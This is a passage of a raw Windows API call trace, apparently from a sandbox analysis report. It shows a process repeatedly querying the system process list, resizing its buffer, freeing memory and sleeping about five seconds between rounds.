Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.153] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.154] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.155] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.156] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.156] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.157] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.157] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.161] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.162] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.164] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.164] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.165] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.165] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.165] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.169] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.169] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.171] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.171] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.172] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.172] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.173] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.176] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.177] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.178] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.179] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.179] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.180] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.180] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.185] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.186] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.187] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.187] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.188] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.188] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.189] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.192] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.193] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.194] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.194] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.195] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.195] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.195] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.199] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.200] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.202] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.202] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.203] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.203] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.203] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.207] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.207] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.211] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.212] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.212] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.212] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.213] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.217] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.217] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.219] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.219] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.219] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.220] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.220] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.223] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.225] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.227] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.227] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.228] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.228] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.228] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.233] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.234] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.235] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.235] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.236] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.236] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.237] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.240] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.241] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.243] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.243] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.243] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.244] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.244] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.247] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.248] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.249] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.249] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.250] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.250] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.250] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.253] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.254] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.256] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.256] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.257] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.257] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.259] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.262] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.263] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.264] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.264] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.265] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.265] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.269] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.270] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.272] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.272] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.273] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.273] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.274] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.277] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.278] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.279] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.280] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.281] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.284] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.285] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.287] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.287] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.288] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.288] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.288] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.292] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.293] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.295] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.295] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.296] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.296] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.299] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.300] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.302] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.302] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.302] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.303] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.307] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.308] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.312] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.313] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) 